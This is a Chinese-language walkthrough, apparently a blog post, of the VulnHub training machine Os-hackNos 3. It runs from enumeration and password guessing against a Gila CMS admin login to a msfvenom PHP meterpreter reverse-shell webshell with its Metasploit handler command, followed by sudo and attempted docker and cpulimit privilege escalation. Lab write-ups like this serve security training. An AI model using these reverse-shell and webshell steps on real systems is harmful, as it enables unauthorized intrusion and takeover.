vulhub:Os-hackNos 3

0x00基本信息

靶机下载地址:

Download: https://drive.google.com/open?id=1zWTU6BFXPmS8BDeoVc766FwUJQZ4-_RT
Download (Mirror): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova
Download (Torrent): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova.torrent ( Magnet)

靶机描述:

Back to the Top
Difficulty: Intermediate
Flag: 2 Flag first user And the second root
Learning: Web Application | Enumeration | Privilege Escalation
Web-site: www.hacknos.com
Contact-us : @rahul_gehlaut
This may work better with VirtualBox rather than VMware

0x01信息收集

kali:192.168;56.102
靶机:192.168.56.104
在这里插入图片描述
端口扫描:
在这里插入图片描述
目录扫描:
在这里插入图片描述
访问80端口:
在这里插入图片描述

访问刚刚目录扫描的script,没有有利用的地方:
在这里插入图片描述
在去访问刚刚页面提到的websec,又出现一个页面,在对这个目录进行遍历,同时在这个页面还发现一个邮箱 contact@hacknos.com :
在这里插入图片描述

在这里插入图片描述
看到有一个amdin目录,知道找到后台登录页面了,访问一下:
在这里插入图片描述

0x02漏洞利用

使用账号:contact@hacknos.com 密码:kali自带 进行爆破,没有爆破成功
使用cewl爬取http://192.168.56.104/websec页面,生成字典
在这里插入图片描述
在使用刚刚生成的密码进行爆破,但是很快就被封掉了
在这里插入图片描述
最后改一下bp,得到密码为Securityx
尝试登陆后台:
在这里插入图片描述
查看后台功能,发现在content中管理web页面:
在这里插入图片描述
使用msfvenom:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=1234 -f raw > webshell.php

在msf设置好监听:

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.36
set lport 1234
run

访问一直报错
在这里插入图片描述
然后去掉webshell中的 /*,同时在文件中新建一个shell目录,再次上传webshell,在通过index.php来包含文件:

<?php
/*!
 * Gila CMS
 * Copyright 2017-19 Vasileios Zoumpourlis
 * Licensed under BSD 3-Clause License
 */

include 'src/core/bootstrap.php';
include 'shell/webshell.php';

?>

在访问主页面,就可以反弹shell:

在这里插入图片描述
在使用python,获取一个交互的tty:
python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述
然后查看文件,在/home/blackdevil找到flag
在这里插入图片描述

0x03提权

1、使用脚本查找提权方式
2、手动查找具有root权限的可执行文件
3、查找具有账户密码

前面2个步骤没有发现东西,然后看了其他文章,在database
在这里插入图片描述
解密地址:http://www.spammimic.com/spreadsheet.php?action=decode
在这里插入图片描述
用户:blacKdevil 密码:Security@x@
在这里插入图片描述

sudo su - 提权

在这里插入图片描述

docker提权

1、下载文件导入:
下载地址:http://dl-cdn.alpinelinux.org/alpine/v3.11/releases/aarch64/
在这里插入图片描述
2、构建的Dockfile(直接在kali里面写好在导入的):
在这里插入图片描述
3、构建镜像:
在这里插入图片描述
4、提取,执行文件,但是在执行文件的时候没有成功
在这里插入图片描述

cpulimit提权

1、把文件编译好,放到靶机:
在这里插入图片描述
wget下载可执行文件到靶机上并通过cpulimit执行
在这里插入图片描述

0x04总结&问题&知识点

1、docker提权:
https://www.hackingarticles.in/docker-privilege-escalation/
https://www.freebuf.com/articles/system/170783.html
2、搭建镜像的方法:
https://www.cnblogs.com/cocowool/p/make_your_own_base_docker_image.html

参考文章:

https://blog.csdn.net/weixin_44214107/article/details/104039918

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值